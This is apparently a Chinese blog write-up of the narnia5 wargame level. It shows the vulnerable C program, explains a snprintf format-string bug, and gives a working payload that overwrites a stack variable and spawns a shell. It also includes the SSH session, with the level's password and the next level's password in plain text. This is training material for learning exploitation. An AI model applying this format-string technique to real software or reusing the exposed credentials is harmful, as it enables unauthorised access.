narnia5
2016-02-16 14:01
176 查看
/** narnia5.c */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char **argv){ int i = 1; char buffer[64]; snprintf(buffer, sizeof buffer, argv[1]); buffer[sizeof (buffer) - 1] = 0; printf("Change i's value from 1 -> 500. "); if(i==500){ printf("GOOD\n"); system("/bin/sh"); } printf("No way...let me give you a hint!\n"); printf("buffer : [%s] (%d)\n", buffer, strlen(buffer)); printf ("i = %d (%p)\n", i, &i); return 0; }
栈环境
格式化漏洞,在调用snprintf之前栈环境如上图所示,
第一个参数为buffer的地址 这里为0xffffd01c
第二个参数为buffer的长度 这里为0x40 既64字节
第三个参数为格式化串的地址 这里为0xffffd2f5
我们输入的格式化串为 python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'
本来按照snprintf的格式, 格式化串后面应该带两个参数的, 一个是整型值, 对应%496x, 另一个是指向整型值的指针,对应%5$n
这样就可以解释为: 把i的地址0xffffd5cc输入到buffer中, 把图中argument 1的值以16进制的形式输出,并且补足496字节,这样snprintf就输出了500字节
虽然只有64字节填入buffer中, 并且把snprintf输出的总字节数,既500写入到第五个argument指针指向的值处,第五个argument就是buffer的首地址
内容是i的地址, 最终就是把i的值改为500
root@today:~# ssh narnia5@178.79.134.250
narnia5@178.79.134.250's password: faimahchiy
narnia5@melinda:~$ cd /tmp/shadowcoder5
narnia5@melinda:/tmp/shadowcoder5$ ls
narnia5 narnia5.c sleep.sh
narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xff\xff\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. No way...let me give you a hint!
buffer : [���� �] (34)
i = 1 (0xffffd5cc)
narnia5@melinda:/tmp/shadowcoder5$ /narnia/narnia5 `python -c 'print "\xcc\xd5\xff\xff" + "%496x" + "%5$n"'`
Change i's value from 1 -> 500. GOOD
$ whoami
narnia6
$ cat /etc/narnia_pass/narnia6
neezocaeng
$
相关文章推荐
- 通过HTML5的getUserMedia实现拍照功能
- POJ2400 KM最大匹配
- Linux下jdk安装
- poj2400===km
- 名詞解釋
- C语言程序设计技巧之字符串长度
- LeetCode 136. Single Number 解题报告
- UITextView头文件学习
- Android 开源项目分类汇总
- Mac phpstorm使用
- C++语言之动态内存分配
- C++语言之动态内存分配
- 使用Camera API https://developer.mozilla.org/zh-CN/docs/Web/Guide/API/Camera
- 通过扫码自定义链接安装iOS app,版本更新总结。
- JS各种表以及地图
- C++语言之动态内存分配
- 反映人生,揭示善恶 - 莎士比亚四大悲剧读后总结
- hexo —— 简单、快速、强大的Node.js静态博客框架
- redis集群
- 欢迎使用CSDN-markdown编辑器